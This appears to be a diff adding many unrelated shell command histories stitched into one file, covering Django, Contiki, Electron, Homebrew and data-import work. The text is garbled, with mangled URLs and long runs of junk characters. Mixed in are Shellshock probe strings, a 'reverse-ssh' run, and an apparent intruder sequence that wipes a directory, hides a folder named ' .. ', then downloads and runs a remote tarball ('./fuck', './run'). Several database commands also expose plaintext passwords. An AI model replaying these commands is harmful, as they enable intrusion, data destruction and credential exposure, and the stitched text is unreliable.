+echo @sfsadf +echo $sfsadf +XXX=2 +echo $XXX +export XXX +env |grep XXX +env +ls +bach -c "echo x" +bash -c "echo x" +env x='() {:;}; echo format whole disk' +env +echo $x +env +env var='f(){fuck;}; echo vulnerable' bash -c /bin/true +ls +pwd +lsd +df +ls +ls +unmount /media/mobilehd +umount +umount /media/mobilehd +sudo umount /media/mobilehd +lsof +fuser +fuser -all +fuser --al +fuser --all +fuser --all ssh +fuser +fuser -a +fuser --a +fuser -l +ls -al +who +pwd +ls +who +ls -al +who +web backend +webback +ping sina.com.cn +ls +df +ls +sudo ./reverse-ssh +cat reverse-ssh +ls +apt-get install +sudo apt-search cache apache +python +python --version +ls +mkdir Django +wget +ls +ls -al +fsafsd/Users/jamesliu/Downloads/Django-1.7.1.tar.gz +dir +tar -xzf Django-1.7.1.tar.gz +ls +tar -xvf Django-1.7.1.tar.gz +ls +mv Django-1.7.1 /opt/ +dir +pwd +ls +python setup.py +cat INSTALL +python setup.py install +python +ls /usr/lib/ +ls +cat INSTALL +dir +python setup.py install +cat setup.py +python setup.py install +wgets/source/s/setuptools/setuptools-0.6c11.tar.gz +tar zxvf setuptools-0.6c11.tar.gz +python setup.py build +python setup.py install +sudo python setup.py install +dir +dir +python setup.py install +sudo python setup.py install +ls +python -c "import sys; sys.path = sys.path[1:]; import django; print(django.__path__)" +top +df +ls -al +ls +ls +ca nohup.out +cat nohup.out +who +m;s +ls -al +ping smb.conf2 +ls -al +cat ls +ls +pyhon +pythyon +python +sudo apt-get install django +ls +dir +cat index.html +uTTYPuTTYPuTTYPuTTYPuTTYPuTTYPuTTYPuTTYPuTTYPuTTYPuTTYPuTTYPuTTYPuTTYPuTTYPuTTYPuTTYPuTTYPuTTYPuTTYPuTTYPuTTYPuTTYPuTTYPuTTYPuTTYPuTTYPuTTYPuTTYPuTTYPuTTYPuTTYPuTTYPuTTYPuTTYPuTTYPuTTYPuTTYPuTTYPuTTYPuTTYPuTTYPuTTYPuTTYPuTTYPuTTYPuTTYPuTTYPuTTYPuTTYPuTTYPuTTYPuTTYPuTTYPuTTYPuTTYPuTTYPuTTYPuTTYPuTTYPuTTYPuTTYPuTTYPuTTYPuTTYPuTTYPuTTYPuTTYPuTTYPuTTYPuTTYPuTTYPuTTYPuTTYPuTTYPuTTYPuTTYPuTTYPuTTY6cPuTTYPuTTYPuTTYPuTTYPuTTYPuTTYPuTTYPuTTYPuTTYPuTTYPuTTYPuTTYPuTTYPuTTYPuTTYPuTTYPuTTYPuTTYPuTTYPuTTYPuTTYPuTTYPuTTYPuTTYPuTTYPuTTYPuTTYPuTTYPuTTYPuTTYPuTTYPuTTYPuTTYPuTTYPuTTYPuTTYPuTTYPuTTYPuTTYPuTTYPuTTYPuTTYPuTTYPuTTY:PuTTYPuTTYPuTTYPuTTYPuTTYPuTTYPuTTYPuTTYPuTTYPuTTYPuTTYPuTTYPuTTYPuTTYPuTTYPuTTYPuTTYPuTTYPuTTYPuTTYPuTTYPuTTYPuTTYPuTTYPuTTYPuTTYPuTTYPuTTYPuTTYPuTTYPuTTYPuTTYPuTTYPuTTYPuTTYPuTTYPuTTYPuTTYPuTTYPuTTYPuTTYPuTTYPuTTYPuTTYPuTTYPuTTYPuTTYPuTTYPuTTYPuTTYPuTTYPuTTYPuTTYPuTTYPuTTYPuTTYPuTTYPuTTYPuTTYPuTTYPuTTYPuTTYPuTTYPuTTYPuTTYPuTTYPuTTYPuTTYPuTTYPuTTYPuTTYPuTTYPuTTYPuTTYPuTTYPuTTYPuTTYPuTTYPuTTYPuTTYPuTTYPuTTYPuTTYPuTTYPuTTYPuTTYPuTTYPuTTYPuTTYPuTTYPuTTYPuTTYPuTTYPuTTYPuTTYPuTTYPuTTYPuTTYPuTTYPuTTYPuTTYPuTTYPuTTYPuTTYPuTTYPuTTYPuTTYPuTTYPuTTYPuTTYPuTTYPuTTYPuTTYPuTTYPuTTYPuTTYqPuTTYPuTTYPuTTYPuTTYPuTTYPuTTYPuTTYPuTTYPuTTYPuTTYPuTTYPuTTYPuTTYPuTTYPuTTYPuTTYPuTTYPuTTYPuTTYPuTTYPuTTYPuTTYPuTTYPuTTYPuTTYPuTTYPuTTYPuTTYPuTTYPuTTYPuTTYPuTTYPuTTYPuTTYPuTTYPuTTYPuTTYPuTTYPuTTYPuTTYPuTTYPuTTYPuTTYPuTTYPuTTYPuTTYPuTTYPuTTYPuTTYPuTTYPuTTYPuTTYPuTTYPuTTYPuTTYPuTTYPuTTYPuTTYPuTTYPuTTYPuTTYPuTTYPuTTYPuTTYPuTTYPuTTYPuTTYPuTTYPuTTYPuTTYPuTTYPuTTYPuTTYPuTTYPuTTYPuTTYPuTTYPuTTYPuTTYPuTTYPuTTYPuTTYPuTTYPuTTYPuTTYPuTTYPuTTYPuTTYPuTTYPuTTYPuTTYPuTTYPuTTYPuTTYPuTTYPuTTYPuTTYPuTTYPuTTYPuTTYPuTTYPuTTYPuTTYPuTTYPuTTYPuTTYPuTTYPuTTYPuTTYPuTTYPuTTYPuTTYPuTTYPuTTYPuTTYPuTTYPuTTYPuTTY +ls +dior +dir +rm index.html +ls -al +ls +ls -al +ls +python +sudo apt-get install mysql +sudo apt-get install sqllite +sudo apt-get install sql +sudo apt-get install git +sudo apt-cache search sql +sudo apt-cache search sql|more +sudo apt-cache search sqllite +sudo apt-cache search sqlite +sudo apt-get install sqlite +sqlite +ls -al +ping www.tvupack.com +ls -al +top +htop +sudo apt-get install htop +man htop +htop +ls -al +top +django-admin.py +pwd +dir +django-admin.py startproject mysite +ls +ls +vim manage.py +ls +top +htop +ls +ls +ls -k +ls -al +vim ../metro-census.py +exit +ls +rm index.htm* +ls +ls +vim monitor-mem.py +cat /proc/1/status +ps +ps -ef +ls -al +cat monitor-mem.py +cat /proc/1/status +ls -al +vim monitor-mem.py +python +ls -al +ls +dir +dir +vim INSTALL +dir +vim README +dir +ls +python +python --version +ping liu5995.eicp.net +quit +ls -al +pi +python +ls -al +ls +dir +vim monitor-mem.py +vi monitor-mem.py +cat hello.c +vim hello.c +vim ../hello.c +ls +ls -al +vim quit +ls +vim monitor-mem.py +ls +ls -al +cat monitor-mem.py +ls +./m +ls cd python-learn +ls +ls +./monitor-mem.py +ls -al +chmod +x monitor-mem.py +./monitor-mem.py +cat monitor-mem.py +ls /bin/python +ls /bin +locate python +locate python|more +echo $PATH +set +set |grep PYTHON +set | grep python +set +lsusb +ls /tty/gsm* +ls /dev/tty* +ifconfig +wvdial +sudo apt-get install wvdial +usb_modeswitch +sudo apt-get install usb_modeswtich +sudo apt-get install usb_modeswitch +mkdir install +wgetsberghof.de/usb_modeswitch/usb-modeswitch-2.2.0.tar.bz2 +ls +tar -xvf usb-modeswitch-2.2.0.tar.bz2 +ls +ls +make install +sudo make install +locate lisbusb +locate lisusb +locate libusb +locate libusb.h +ls +config +cat README +make install-static +sudo apt-get install libusb +sudo apt-cache search libusb +sudo apt-get install libusb-1.0-0 +sudo apt-get install libusb-dev +ls +pwd +ls -al +cat changlog +vim changlog +cat changl +ls +cat ChangeLog +ls +vi /etc/sysconfig/i18n +ls +ls /etc/sysconfig +ls /etc/i18n +ls +pwd +ls +pwd +ls +sadfsadfsadfls +w +uname -a +w +help +w +users +ps x +ps ax +who +w +uptime +wget +ls -al +rm -rf * +w +ls -al +mkdir " .. " +wget piti.sufx.net/redone.tar.gz;tar xvf redone.tar.gz;cd redone;./config mishima 2828;./fuck;./run +ps x +uname -a +ps -A +ps ax +w +who +help +who +passwd +w +vi client.h +vi udp-client-sensor.c +vi project-conf.h +./make-rom-vr.sh +ls +./make-clean.sh +ls +vi project-conf.h +vi udp-client-sensor.c +ls +ls +ls +hdc-1000-sensor.c +vi hdc-1000-sensor.c +ls +ls +vi hdc-1000-sensor.c +ls +ls +vi project-conf.h +./make-rom-vr.sh +ls +vi udp-client-sensor.c +./make-clean.sh +ls +./make-rom-vr.sh +ls +./make-clean.sh +ls +vi udp-client-sensor.c +./make-clean.sh +./make-rom-vr.sh +ls +./make-clean.sh +ls +vi udp-client-sensor.c +vi project-conf.h +vi project-conf.h +./make-rom-vr.sh +ls +./make-clean.sh +ls +vi project-conf.h +vi udp-client-sensor.c +ls +ls +ls +ls +vi hdc-1000-sensor.c +ls +ls +vi hdc-1000-sensors.c +vi hdc-1000-sensor.c +ls +./make-rom-vr.sh +ls +ls +ls +ls +ls +ls +ls +vi hdc-1000-sensor.c +ls +ls +ls +ls +./make-clean.sh +ls +vi udp-client-sensor.c +ls +ls +ls +ls +ls +ls +vi hdc-1000-sensor.c +ls +ls +vi hdc-1000-sensor.c +ls +ls +vi contiki-conf.h +ls +ls +ls +ls +./make-clean.sh +ls +vi udp-client-sensor.c +vi project-conf.h +ls +ls +ls +ls +vi hdc-1000-sensor.c +ls +vi hdc-1000-sensor.c +ls +ls +ls +./make-rom-vr.sh +ls +ls +ls +vi contiki-conf.h +vi project-conf.h +ls +./make-vr 23 +ls +ls +ls +vi contiki-conf.h +vi project-conf.h +./make-vr 26 +ls +ls +ls +ls +ls +ls +ls +./make-vr 26 +ls +ls +ls +./make-vr 26 +./make-vr 26 +ls +ls +ls +./make-vr 26 +ls +ls +ls +./make-vr 26 +ls +ls +ls +./make-vr 26 +ls +ls +ls +./make-vr 26 +ls +ls +ls +./make-vr 26 +./make-vr 23 +./make-vr 26 +ls +ls +ls +./make-vr 26 +./make-vr 26 +ls +ls +ls +./make-vr 26 +ls +ls +./make-vr 26 +ls +ls +ls +./make-vr 26 +./make-vr 23 +ls +ls +ls +./make-vr 23 +ls +ls +ls +./make-vr 26 +ls +ls +ls +./make-vr 23 +ls +ls +ls +./make-vr 23 +./make-vr 23 +ls +ls +ls +./make-vr 23 +ls +./make-vr 23 +ls +ls +ls +./make-vr 23 +ls +ls +ls +./make-vr 23 +ls +ls +ls +./make-vr 23 +ls +ls +ls +./make-vr 23 +ls +ls +ls +./make-vr 23 +ls +ls +ls +./make-vr 23 +ls +ls +./make-vr 23 +ls +ls +./make-vr 23 +ls +ls +./make-vr 23 +ls +./make-vr 26 +ls +ls +ls +./make-vr 21 +./make-vr 26 +ls +ls +./make-vr 21 +./make-vr 26 +ls +./make-vr 21 +./make-vr 26 +./make-vr 21 +./make-vr 26 +./make-vr 21 +./make-vr 26 +ls +ls +./make-vr 21 +ls +ls +ls +./make-vr 19 +./make-vr 19 +./make-vr 20 +./make-vr 22 +./make-vr 25 +./make-vr 18 +ls +./make-vr 19 +./make-vr 23 +ls +./make-vs 26 +./make-vs 26 +ls +./make-vs 26 +./make-vs26 +ls +ls +ls +./make-vs 24 +make-vs 26 +./make-vs +./make-vs 26 +ls +./make-vs 26 +ls +ls +ls +ls +./make-vs 26 +ls +ls +ls +./make-vs 26 +ls +ls +./make-vs 26 +ls +./make-vs 26 +./make-vs 26 +./make-vs 24 +./make-vs 19 +ls +ls +ls +ls +./make-vs 26 +./make-vs 26 +ls +ls +ls +./make-vs 26 +./make-vs 26 +ls +./make-vs 26 +ls +VS-1.4.1 +ls +ls +./make-vr 26 +./make-vs 26 +./make-vs 24 +ls +./make-vs 26 +./make-vs 26 +ls -la +ls -la +ls -la +mkdir mvn practice +mvn archetype:generate +mvn compile +mkdir neelu +pwd +mkdir neelu1 +ls +mkdir neelu2 neelu3 +ls +ll +touch neelu +cat neelu +rm neelu2 +rm neelu1 +java -jar jenkins.war +java -jar jenkins.war +java -jar jenkins.war +java -jar jenkins.war +java -jar jenkins.war +mvn compile +mkdir neelu +java -jar jenkins.war +java -jar jenkins.war +java -jar jenkins.war +java -jar jenkins.war +java -jar jenkins.war +java -jar jenkins.war +java -jar jenkins.war +java -jar jenkins.war +java -jar jenkins.war +exit +ls +python manage.py createsuperuser +exit +python manage.py test stocks +python manage.py test stocks +python manage.py test stocks +exit +python manage.py test stocks +python manage.py test stocks +python manage.py test stocks +python manage.py test stocks +python manage.py test stocks +python manage.py test stocks +python manage.py test stocks +python manage.py test stocks +python manage.py test stocks +python manage.py test stocks +python manage.py test stocks +python manage.py test stocks +python manage.py test stocks +python manage.py test stocks +python manage.py test stocks +python manage.py test stocks +python manage.py test stocks +python manage.py test stocks +python manage.py test stocks +python manage.py test stocks +python manage.py test stocks +python manage.py test stocks +python manage.py test stocks +python manage.py test stocks +python manage.py test stocks +python manage.py test news +python manage.py test news +python manage.py test news +python manage.py test stocks +python manage.py test accounts +python manage.py test accounts +python manage.py test base +exit +git checkout -b 20170224 +code . +clear && electron . +clear && electron . +clear && electron . +clear && electron . +clear && electron . +clear && electron . +clear && electron . +LS +CD APP +LS +ls +http-server +electron . +git checkout -b 20170227 +git add . +git commit -m "Focus line proof-of-concept" +clear +git push tony --all && git push bitbucket --all +clear && electron . +git add . +git commit -m "Add foreign object to contain div within chart container svg in order to enable scrolling" +git push tony --all && git push bitbucket --all +clear +electron . +git add . +git commit -m "Change chart container dimensions for proper scrolling" +git push tony --all && git push bitbucket --all +electron . +git checkout -b 20170225 +clear +electron . +code . +git st +clear +ls +http-server +clear +clear +code . +clear && electron . +clear && electron . +git checkout -b 20170228 +clear +electron . +git add . +git commit -m "Chart and Axis SVG container heights" +git push tony --all && git push bitbucket --all +clear && electron . +clear && electron . +git add . +git commit -m "Add function group under new Missile Type and Variant hierarchy" +git push tony --all && git push bitbucket --all +clear && electron . +git add . +git commit -m "Add function to function group using new missile type and missile variant hierarchy" +git push tony --all && git push bitbucket --all +clear && electron . +git add . +git commit -m "Check for existing function group before adding" +git push tony --all && git push bitbucket --all +ping juryweb.mono.courts.ca.gov +netstats.ca.gov +exot +exit +nettrcs.ca.gov +nettrace www.google.com +exit +brew unlink openssl +which openssl +brew uninstall openssl +brew uninstall sane-backends +clear +exit +clear +git checkout -b 20170306 +code . +electron . +git add . +git commit -m "Vertical line tool text labels" +git push tony --all && git push bitbucket --all +clear +git checkout -b 20170306-Zoom +clear +clear && electron . +git add . +git commit -m "Multi-Chart zoom brush. However, had to turn events off on div via pointer-events, so scroll no longer works." +git push tony --all && git push bitbucket --all +clear +git checkout -b 20170307 +electron . +clear +git add . +git commit -m "Brush zoom over multiple charts. Still need to add zoom function call to chart class to do the actual zoom." +git push tony --all && git push bitbucket --all + ldf +clear +electron . +git st +git add . +git commit -m "Code cleanup and variable name changes." +git push tony --all && git push bitbucket --all +clear +git checkout -b 20170308 +code . +electron . +git add . +git commit -m "Remove function from function group when deselected in group builder" +git push tony --all && git push bitbucket --all +git add . +git commit -m "Code cleanup" +git push tony --all && git push bitbucket --all +clear && electron . +git add . +git commit -m "Moved group builder functions from functions directory to groupBuilder directory" +git push tony --all && git push bitbucket --all +clear +brew link --force openssl +dotnet +exit +dotnet +exit +dotnet +which openssl +exit +which openssl +open /usr/local//bin +dotnet +exit +exit +dotnet +dotnet +brew update +brew install openssl +brew install openssl +clear +brew uninstall openssl +brew uninstall --ignore-dependencies openssl +clear +brew update +brew upgrade +brew uninstall elixir +brew uninstall elixir +brew uninstall --force elixir +xcode-select --install +clear +xcode-select --install +brew uninstall --force elixir +brew uninstall openssl +brew uninstall sane-backends +brew uninstall wine +brew uninstall --force wine +brew uninstall sane-backends +brew uninstall --force sane-backends +brew uninstall --force elixir +brew uninstall --force openssl +brew install --force erlang +brew --list +brew --help +brew list +brew uninstall --force groovy +brew uninstall --force haskell-stack +brew uninstall --force macvim +brew install --force mono +clear && brew list +brew uninstall --force openssl101 +brew uninstall openssl +brew uninstall --force erlang +brew uninstall --force openssl +brew uninstall net-snmp +brew uninstall openssl +brew uninstall python +brew uninstall vim +brew uninstall python +brew uninstall --force python +clear +brew uninstall --force openssl +brew uninstall --force python3 +brew uninstall --force openssl +brew uninstall --force ruby +clear +brew uninstall --force openssl +clear && brew list +brew uninstall --force cmake +brew uninstall --force mono +clear && brew list +clear +brew install openssl +brew list +clear +brew uninstall --force mono +sudio xcodebuild -license accept +sudo xcodebuild -license accept +brew uninstall --force mono +clear && brew list +brew install openssl +clear +mkdir -p /usr/local/lib +ln -s /usr/local/opt/openssl/lib/libcrypto.1.0.0.dylib /usr/local/lib/ +dotnet +clear +rm /usr/local/opt/openssl/lib/libcrypto.1.0.0.dylib +rm /usr/local/opt/openssl/lib/libssl.1.0.0.dylib +clear +ln -s /usr/local/opt/openssl/lib/libcrypto.1.0.0.bylib /usr/local/lib/ +ln -s /usr/local/opt/openssl/lib/libssl.1.0.0.dylib /usr/local/lib/ +rm /usr/local/opt/openssl/lib/libssl.1.0.0.dylib +rm /usr/local/opt/openssl/lib/libssl.1.0.0.dylib +ls -s /usr/local/opt/openssl/lib/libssl.1.0.0.dylib /usr/local/lib/ +clear +ls -s /usr/local/opt/openssl/lib/libssl.1.0.0.dylib /usr/local/lib/ +clear +brew update openssl +brew upgrade openssl +clear +ln -s /usr/local/opt/openssl/lib/libssl.1.0.0.dylib /usr/local/lib/ +rm /usr/local/opt/openssl/lib/libssl.1.0.0.dylib +ls /usr/local/lib +dotnet +openssl --version +openssl -v +openssl +clear +find . -type l -ls +clear +ls +clear +export PATH=/usr/local/share/dotnet:$PATH +dotnet +exti +exit +dotnet +ls /etc/paths +open /etc/paths +sudo open /etc/paths +open ~/.bash_profile +exit + ln -s /usr/local/opt/openssl/lib/libcrypto.1.0.0.dylib /usr/local/lib/ + ln -s /usr/local/opt/openssl/lib/libssl.1.0.0.dylib /usr/local/lib/ +clear +rm /usr/local/opt/openssl/lib/libcrypto.1.0.0.dylib +/usr/local/opt/openssl/lib/libssl.1.0.0.dylib +ln -s /usr/local/opt/openssl/lib/libcrypto.1.0.0.dylib /usr/local/lib/ +rm /usr/local/lib//libcrypto.1.0.0.dylib +rm /usr/local/opt/openssl/lib//libcrypto.1.0.0.dylib +rm /usr/local/opt/openssl/lib/libcrypto.1.0.0.dylib +/usr/local/opt/openssl/lib/libssl.1.0.0.dylib +/usr/local/opt/openssl/lib//libssl.1.0.0.dylib +clear +ln -s /usr/local/opt/openssl/lib/libcrypto.1.0.0.dylib /usr/local/lib/ +ln -s /usr/local/opt/openssl/lib/libssl.1.0.0.dylib /usr/local/lib/ +rm /usr/local/lib//libssl.1.0.0.dylib +ln -s /usr/local/opt/openssl/lib/libssl.1.0.0.dylib /usr/local/lib/ +pwd +exit +dotnet +mkdir dotnet-projects +mkdir first-dotnet-project +dotnet new +dotnet restore +ls +ls +dotnet new +clear +dotnet new +dotnet new console +ls +dotnet restore +dotnet run +clear +open . +code . +code . +clear && code . +edit ~/.bash_profile +open ~/.bash_profile +open ~/.bash_profile +code . +ls +code . +code . -N +clang --version +mkdir c-learning +mkdir hello +touch hello.c +subl hello.c +make hello +clear && make hello +./hello +clear && make hello +./hello +clear && make hello +clear && make hello +clear && make hello +clear && make hello +clear && make hello +./hello +clear && make hello +./hello +clear && make hello +./hello +exit +brew update +clear +brew install macvim +brew upgrade +clear +macvim +clear +mvim +lsmod +lsmod +clear +code . +ls ./**/*.js +pwd +ls **/*.js +find *.js +find -name '*.js' +find . -name '*.js' -type f +find . -name '*.js' -type f -not -path 'node_modules' +find . -name '*.js' -type f -not -path './node_modules*' +find . -name '*.js' -type f -not -path './node_modules*' -exec mv {} ./app/js +find . -name '*.js' -type f -not -path './node_modules*' -exec mv {} ./app/js \; +find . -name '*.js' -type f -not -path './node_modules*' -exec mv {} ./app/js \; +find . -name '*.js' -type f -not -path './node_modules*' -exec mv {} ./app/js \;clear +clear +find . -name '*.html' -type f -not -path './node_modules*' -exec mv {} ./app/html \; +find . -name '*.css' -type f -not -path './node_modules*' -exec mv {} ./app/css \; +code . +git st +git checkout app/views/index.html +git checkout app/views/index/index.html +c;ear +clear +electron . +electron . +electron . +electron . +electron . +electron . +electron . +clear +clear && electron . +clear && electron . +clear && electron . +clear && electron . +clear +git add . +clear +git commit -m "First round of project refactor" +clear +git push tony --all && git push bitbucket --all +clear +code . +electron . +clear && electron . +clear +npm update +clear && npm update +npm upgrade +clear +npm update +npm upgrade +npm install -D aurelia-logging +clear +electron. +electron . +clear && electron . +clear && electron . +clear && electron . +clear && electron . +clear && electron . +clear && electron . +npm istall aurelia-framework +clear +npm install aurelia-framework -D +npm install aurelia-logging-console -D +clear && electron . +clear && electron . +clear && electron . +clear && electron . +clear && electron . +clear && electron . +clear && electron . +clear && electron . +clear && electron . +clear && electron . +clear && electron . +clear && electron . +clear && electron . +clear && electron . +clear && electron . +clear && electron . +clear && electron . +npm install typescript@latest +ls +tsc LoggerTest.ts +clear +node LoggerTest.js +clear +electron . +clear +electron . +electron . +electron . +clear && electron . +clear +git add . +git st +git commit -m "More project structure refactoring. Add Aurelia logging" +git push tony --all && git push bitbucket -all +git push tony --all && git push bitbucket --all +clear +electron --version +npm update electron@latest +electron --version +npm update electron@1.6.2 +npm install electron@1.6.2 -D +electron --version +npm update +electron --version +clear +electron . +code . +electron . +git checkout -b 20170317 +clear +electron . +clear +git add . +git commit -m "When existing group name selected in group builder, check each function in function table if it exists in function group" +git push tony -all && git push bitbucket --all +git push tony --all && bit push bitbucket --all +clear && electron . +git add . +git commit -m "Refactor group builder dropdown selects into their own classes." +git push tony --all && git push bitbucket --all +clear && electron . +ls +ls +ls +mvim Chart.js +mvim +mvim +mvim +mvim ~/.vimrc +mvim +mvim +brew install zathura +brew install zathura-pdf-poppler +brew install zathura +clear +pwd +ls +clear && git st +diff +git diff +clear +brew install zsh zsh-completions +clear +curl -Lssell/oh-my-zsh/raw/master/tools/install.sh | sh +clear +chsh -s /usr/local/bin/zsh +clear +vim ~/.zshrc +clear +sh -c "$(curl -fsSLsercontent.com/robbyrussell/oh-my-zsh/master/tools/install.sh)" +rm /Users/Tony/.oh-my-zsh +rm -rf /Users/Tony/.oh-my-zsh +sh -c "$(curl -fsSLsercontent.com/robbyrussell/oh-my-zsh/master/tools/install.sh)" +exit +ls +exit +exit +/ect/wpa_supplicant/wpa_supplicant.conf +nano /ect/wpa_supplicant/wpa_supplicant.conf +nano wpa_supplicant.conf +systemctl restart dhcpcd +reboot +ping cisco.com +ping google.com +nano /ect/wpa_supplicant/wpa_supplicant.comf +nano /ect/wpa_supplicant/wpa_supplicant.conf +ls +ls +ls +nano wpa_supplicant.conf +nano wpa_supplicant.conf +systemctl restart dhcpcd +nano wpa_supplicant.conf +systemctl restart dhcpcd +reboot +ping cisco.com +apt install man-db +apt install man-db +clear +apt install man-db +install net-tools +apt install net-tools +halt +passwd +exit +ls +sort gisteren +sort +1 -2 gisteren +sort -nrk 2,2 gisteren +if[[$echo $line\cut -c1) = "?"]] +cat $gisteren cut -c1 +cut -cl-7 gisteren +cut -c1-7 gisteren +cat $gisteren | cut -c1-1 +cat gisteren | cut -c1-1 +wc gisteren3 +head gisteren -n 5 +tail gisteren -n 3 +wc gisteren cut 3-5 +wc gisteren3 cut 3-5 +wc -m cut 3-5 +wc -m gisteren cut 3-5 +wc -m gisteren3 cut 3-5 +wc gisteren -m cut 3-5 +wc gisteren3 -m cut 3-5 +cut 3-5 wc gisteren3 -m +cut -c 4-10 gisteren3 +cut -c 4-10 gisteren3 wc -m +head gisteren3 -n 5 tails gisteren5 wc gisteren3 +head gisteren3 -n 5 >> tails gisteren5 >> wc gisteren3 +head gisteren3 -n 5 >> tails gisteren3 >> wc gisteren3 +head gisteren3 -n 5 >> tails gisteren3 wc gisteren3 +head gisteren3 -n 5 +head gisteren3 -n 5 >> tail gisteren3 +sed -n 3,5p gisteren3 +sed -n 3,5p gisteren3 | wc -n gisteren3 +sed -n 3,5p gisteren3 | wc -n +sed -n 3,5p gisteren3 | wc -m +cat echo +touch echo +ls +ncal gisteren +cat > 2.3 +nano echo +chmod a+x echo +./echo +nano echo +chmod a+x echo +./echo +nano echo +chmod a+x echo +./echo +nano echo +chmod a+x echo +./echo +nano echo +chmod a+x echo +nano echo +chmod a+x echo +./echo +nano echo +chmod a+x echo +./echo +nano echo +chmod a+x echo +./echo +nano echo +chmod a+x echo +./echo +nano echo +chmod a+x echo +./echo +./echo +nano echo +chmod a+x echo +./echo +nano echo +chmod a+x echo +./echo +nano naam +nano naam +chmod a+x naam +./naam +nano naam +chmod a+x naam +./naam +nano commando +chmod a+x commando +./commando +nano commando +nano commando +chmod a+x commando +./commando +./commando +nano commando +chmod a+x commando +./commando +-bash: ./commando: bin/bash: bad interpreter: No such file or directory +-bash: ./commando: bin/bash: bad interpreter: No such file or directory +nano command +nano commando +./commando +ls +nano commando +./commando +ls +chmod a+x commando +./commando +ls +nano commando +reak +break +halt +ls +nano echo +make +make opdracht1.cpp +makefile opdracht1.cpp +Makefile opdracht1.cpp +nano opdracht1.cpp +ls +nano opdracht1.cpp +nano opdracht1.cpp +nano opdracht1.cpp +nano opdracht1.cpp +nano opdracht1.cpp +nano opdracht1.cpp +break +halt +nano opdracht1.cpp +halt +ls +nano opdracht1.cpp +nano opdracht1.cpp +nano opdracht1.cpp +halt +./build +apt-get install sudo -y +ls +reboot +nano opdracht1.cpp +nano opdracht1.cpp +git +sudo apt-get install git-core +apt-get install git-core +apt-get update +git +apt-get install git-core +git +git clone git://git.drogon.net/wiringPi +./build +nano build +./build +./build +su - +passwd fedora +ls +mkdir public_html +ls +mkdir DBTest +touch DBTest.php +vi DBTest.php +.. +ls +touch DBTest.php +help +ls +ls +DBTest.php +vi DBTest.php +exit +ls +ll +ls +mkdir PolygonOverlay +ls +vi index.php +vi db_connect.php +vi functions.php +touch index.php +ls +vi index.php +curl .location .globoffs/texas-latest.osm.bz2 -o texas.osm.bz2 +whoami +ll +git init +ll +ll +mv DBTest/ 5443 +mv PolygonOverlay/ 5443 +ll +ll +git add --all +git commit -m "first commmit" +ll +rm -rf .git +ll +mv DBTest/ .. +mv PolygonOverlay/ .. +ll +rm -rf 5443 +ll +exit +git clone curl .location .globoffs/texas-latest.osm.bz2 -o texas.osm.bz2 +git clone +ll +git push public_html +ls +public_html +exit +ls +exit +ll +public_html +cs public_tml +mkdir MilitaryInstallations +ll +ll +vi index.php +ll +vi index.php +ll +exit +ogr2ogr -f MySQL MySQL:thackbarth,host=localhost,user=thackbarth,password= og1cee1E -nln MilitaryBase -update -overwrite -lco engine=MYISAMta +ogr2ogr -f MySQL MySQL:thackbarth,host=localhost,user=thackbarth,password= zeebot123 -nln MilitaryBase -update -overwrite -lco engine=MYISAMta +/* This file connects to your MySQL database. */ +// Connection constants +define('DB_HOST', 'localhost'); +define('DB_USER', 'YOURUSERNAME'); +define('DB_PASSWORD', 'YOURDBPASSWORD'); +define('DB_DATABASE', 'YOURDBNAME'); +define('DB_PORT', 3306); +// Error-checking to ensure you have set the values above before trying to run one of the examples +if(DB_USER === 'REPLACEME' || DB_PASSWORD === 'REPLACEME' || DB_DATABASE === 'REPLACEME'); { } +// Connect to the database using PHP's MySQLi object-oriented library +$mysqli = new mysqli(DB_HOST, DB_USER, DB_PASSWORD, DB_DATABASE, DB_PORT); +if ($mysqli->connect_errno) +{ + die("Failed to connect to MySQL: (" . $mysqli->connect_errno . ") " . $mysqli->connect_error); +ogr2ogr -f MySQL MySQL:thackbarth,host=localhost,user=thackbarth,password= og1cee1E -nln MilitaryBase -update -overwrite -lco engine=MYISAMta + +// Error-checking to ensure you have set the values above before trying to run one of the examplesss +stop +exit +:xdefine('DB_HOST', 'localhost'); +ogr2ogr -f MySQL MySQL:thackbarth,host=localhost,user=thackbarth,password= zeebot123 -nln MilitaryBase -update -overwrite -lco engine=MYISAMta + +xit +exit +ogr2ogr -f MySQL MySQL:thackbarth,host=localhost,user=thackbarth,password= zeebot123 -nln MilitaryBase -update -overwrite -lco engine=MYISAMta +ogr2ogr -f MySQL MySQL:thackbarth,host=localhost,user=thackbarth,password= og1cee1E -nln MilitaryBase -update -overwrite -lco engine=MYISAMta +ogr2ogr -f MySQL MySQL:thackbarth,host=localhost,user=thackbarth,password=og1cee1E Shape -nln MilitaryBase -update -overwrite -lco engine=MYISAMta +ogr2ogr -f MySQL MySQL:thackbarth,host=localhost,user=thackbarth,password=og1cee1E MilitaryBase -nln MilitaryBase -update -overwrite -lco engine=MYISAMta +ll +wgetsus.gov/geo/tiger/TIGER2013/MIL/tl_2013_us_mil.zip +unzip +tl +unzip tl_2013_us_mil.zip +ogr2ogr -f MySQL MySQL:thackbarth,host=localhost,user=thackbarth,password=og1cee1E tl_2013_us_mil.shp -nln MilitaryBase -update -overwrite -lco engine=MYISAMta +ogr2ogr -f MySQL MySQL:thackbarth,host=localhost,user=thackbarth,password=og1cee1E tl_2013_us_mil.shp -nln tl_2013_us_mil -update -overwrite -lco engine=MYISAMta +ogr2ogr -f MySQL MySQL:thackbarth,host=localhost,user=thackbarth,password=og1cee1E tl_2013_us_mil.shp -nln tl_2013_us_mil -update -overwrite -lco engine=MYISAM +exit +ll +exit +ls +sudo apt-get update +apt-get install git -y +sudo apt-get install git -y +sudo apt-get install curl -y +sudo apt-get install python3-pip -y +sudo apt-get install wget -y +sudo apt-get install -y python-numpy python-dev cmake zlib1g-dev libjpeg-dev xvfb libav-tools xorg-dev python-opengl libboost-all-dev libsdl2-dev swig +sudo apt-get install xvfb +ls +mkdir Tensorflow +ls +ls +ls +git clones2017@github.com/modelriskanalytics/ReinforcementLearning.git +ls +wgetshayg/tensorflow-build/raw/master/tensorflow-1.3.0rc2-cp35-cp35m-linux_x86_64.whl +wgetshayg/tensorflow-build/raw/master/tensorflow-1.4.0-cp35-cp35m-linux_x86_64.whl +pip3 install --upgrade pip +ls +pip3 install --ignore-installed --upgrade tensorflow-1.4.0-cp35-cp35m-linux_x86_64.whl +pip3 install --ignore-installed --upgrade tensorflow-1.4.0-cp +sudo pip3 install --ignore-installed --upgrade tensorflow-1.4.0-cp35-cp35m-linux_x86_64.whl +pip3 install gym +sudo pip3 install gym +sudo pip3 install gym[all] +ls +sudo pip3 install jupyter +ls +ls +sudo pip3 install -r requirement.txt +ls +python3.5 